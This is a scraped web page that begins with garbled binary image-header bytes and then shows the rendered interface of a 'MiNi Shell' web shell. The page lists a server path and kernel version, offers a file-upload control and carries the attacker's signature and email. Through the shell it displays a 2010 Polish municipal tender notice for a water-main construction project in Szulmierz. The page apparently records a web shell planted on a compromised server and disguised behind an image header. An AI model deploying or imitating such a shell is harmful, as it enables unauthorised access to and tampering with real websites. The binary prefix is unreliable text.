JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100108/5241-N-2010.html

<p class="kh_header"><b>Regimin: Budowa wodociągu w m. Szulmierz o długości około 2200m</b><br>
<b>Numer ogłoszenia: 5241 - 2010; data zamieszczenia: 08.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Regiminie , Regimin 22, 06-461 Regimin, woj. mazowieckie, tel. 023 6811756, faks 023 6811756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.regimin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wodociągu w m. Szulmierz o długości około 2200m.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa sieci wodociągowej o długości ok. 2200 m. wraz z robotami dodatkowymi w tym :

- wykonanie robót ziemnych-wykopy i zasypywanie wykopów - łącznie 12 486,240, m3
- wykonanie pojedyńczych opasek z kiszek faszynowych o śr. 15 cm - 20 m umocn.,
- wykonanie pojedyńczych opasek z kiszek faszynowych o śr. 20 cm - 40 m umocn.,
- naprawa skarp rowów przez darniowanie  na mur z darniny złożonej przy górnej krawędzi skarpy - 90m kwadrat.,
- rury ochronne o śr nom. 150 mm w wykopie 52 m,
- trójniki kołnierzowe wbudowane do istniejących rurociągów o śr. 80 mm - 1 kpl.,
- rurociągi PE-HD 1,0 MPa Dz90/8,2 ciśnieniowe łączenie metodą zgrzewania - 2180 mb,
- rurociągi PCW ciśnieniowe kielichowe łączone na uszczelkę gumową o średnicy zewn. 90/4,3 mm - 488 mb,
- zasuwy żeliwne kołnierzowe z obudową na rurociągach PCW i PE o średn. nom. 80 mm - 7szt.,
- hydranty pożarowe nadziemne na kolanie stopowym kołnierzowym o średn. nom. 80-100 mm - szt. 5,
- przewierty o długości do 20 m maszyną do wierceń poziomych - 27 mb,
(wymieniono jedynie ważniejsze przemioty zamówienia).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.40-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 

2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 7000, słownie: siedem 
    tysięcy złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki,  
    dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli 
    przepisy prawa nakładają obowiązek ich posiadania,

2) posiadania wiedzy i doświadczenia,

3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
    wykonania zamówienia,

4) sytuacji ekonomicznej i finansowej,

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do 
    wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru    
    prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
    zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w 
    szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do 
    dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

3. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą 
    wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

4. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na 
    podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.

5. Udzielą gwarancji na wykonany przedmiot zamówienia na okres minimum 36 miesięcy od daty odbioru 
    końcowego robót podpisanego bez zastrzeżeń.

6. Zamawiający odrzuca ofertę, jeżeli:
1) jest niezgodną z ustawą.
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z 
    zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o 
    zwalczaniu nieuczciwej konkurencji.
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o 
    udzielenie zamówienia.
6) zawiera błędy w obliczeniu ceny.
7) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na 
    poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych
8) jest nieważna na podstawie odrębnych przepisów,

7. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty 
    złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -  
    spełnia/niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

A.1) Formularz ofertowy (załącznik nr 2) - wypełniony i podpisany przez wykonawcę

	A.2) Kosztorys ślepy - wypełniony i podpisany przez wykonawcę

A.3) Wzór umowy  (załącznik nr 1) (podpisana przez wykonawcę w celu akceptacji)

A.4) Oświadczenie o braku podstaw wykluczenia z postępowania o udzielenie         
        zamówienia z art. 24 ust. 1 Prawa zamówień publicznych (załącznik nr 9)

A.5) Wykaz osób do kontaktów z zamawiającym (załącznik nr 6)

A.6) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa  
                   zamówień publicznych (załącznik nr 3)


B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia   
     art. 24 ust 1 Prawa zamówień publicznych wykonawca składa następujące dokumenty:

B.1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do 
       rejestru,   
                  w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2
                  ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu       
                  składania ofert, a przypadku osób fizycznych oświadczenie wymienione w pkt. A.4) 
                  niniejszej specyfikacji.

B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających 
        ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.

B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego                 
       potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub 
       zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
       rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
       właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem 
       terminu składania ofert.

B.4) Aktualne zaświadczenie właściwego organu potwierdzającego, że wykonawca nie     
       zalega z uiszczaniem podatków lub opłat lokalnych - wystawionego nie wcześniej niż                      
       3 miesiące przed upływem terminu składania ofert.

B.5) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych 
       lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca 
       nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub 
                   potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
                   rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
                   właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem 
                   terminu składania ofert.

C. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w art. 22 ust. 1   
    pkt. 1) do 3) ustawy Pzp, należy złożyć następujące dokumenty:
 
C.1) Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania 
       warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat licząc 
       od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
       okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz 
       załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z 
       zasadami sztuki budowlanej i prawidłowo ukończone (załącznik nr 8).

C.2) Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych 
        Wykonawcy usług lub robót budowlanych w celu realizacji zamówienia 
        (załącznik nr 7).

C.3) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od 
        tego, czy są one zatrudnione bezpośrednio przez wykonawcę, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami  
        budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, 
       doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także 
       zakresu wykonywanych przez nie czynności (załącznik nr 4).

C.4) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, 
        posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
        takich uprawnień (załącznik nr 5).

D. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w  art. 22 ust. 1 
     pkt. 4) ustawy Pzp, należy złożyć następujące dokumenty:

D.1) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których 
        wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
        finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 
        miesiące przed upływem terminu składania ofert.

D.2) Opłacona polisa, a w przypadku jej braku inny dokumentu potwierdzający, że 
        wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
        prowadzonej działalności związanej z przedmiotem zamówienia

Inne informacje zawarte są w specyfikacji istotnych warunków zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.regimin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY REGIMIN
REGIMIN 22
06-461 REGIMIN
Pokój nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: URZĄD GMINY REGIMIN
REGIMIN 22
06-461 REGIMIN
Pokój nr 8 (Sekretariat Urzędu).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com